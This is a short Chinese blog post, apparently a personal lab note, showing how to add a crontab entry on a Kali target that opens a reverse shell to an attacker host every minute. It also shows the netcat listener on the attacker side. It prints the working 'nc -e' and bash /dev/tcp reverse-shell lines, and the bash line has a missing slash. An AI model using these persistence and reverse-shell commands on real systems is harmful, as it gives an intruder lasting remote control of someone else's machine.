小实验:Kali设置定时计划任务进行反弹shell

小实验:Kali设置定时计划任务进行反弹shell

我们进行一个简单的计划任务实验,目标就是设置一个每分钟执行反弹shell的计划任务。

靶机:Kali(192.168.1.130)

攻击机:Kali(192.168.1.133)

1、靶机设定计划任务,输入crontab -e进行计划任务的编辑。

crontab -e
* * * * * nc -e /bin/bash 192.168.1.133 6111 0<&1 2>&1      //Kali系统反弹命令(Kali这样写反弹好使,下面命令不好使)
* * * * * bash -i >& dev/tcp/192.168.1.133/6111 0>&1 2>&1   //Ubuntu、Centos等系统反弹命令

image-20230409205347004

image-20230409205755908

image-20230409205858444

2、攻击机(192.168.1.133)的6111端口起监听

nc -lvp 6111

image-20230409205707543

等一分钟后,反弹

image-20230409205923381

尝试输入一些命令,成功执行

image-20230409210006892

3、实验成功。

posted @ 2023-04-11 11:58  6小1  阅读(467)  评论(0编辑  收藏  举报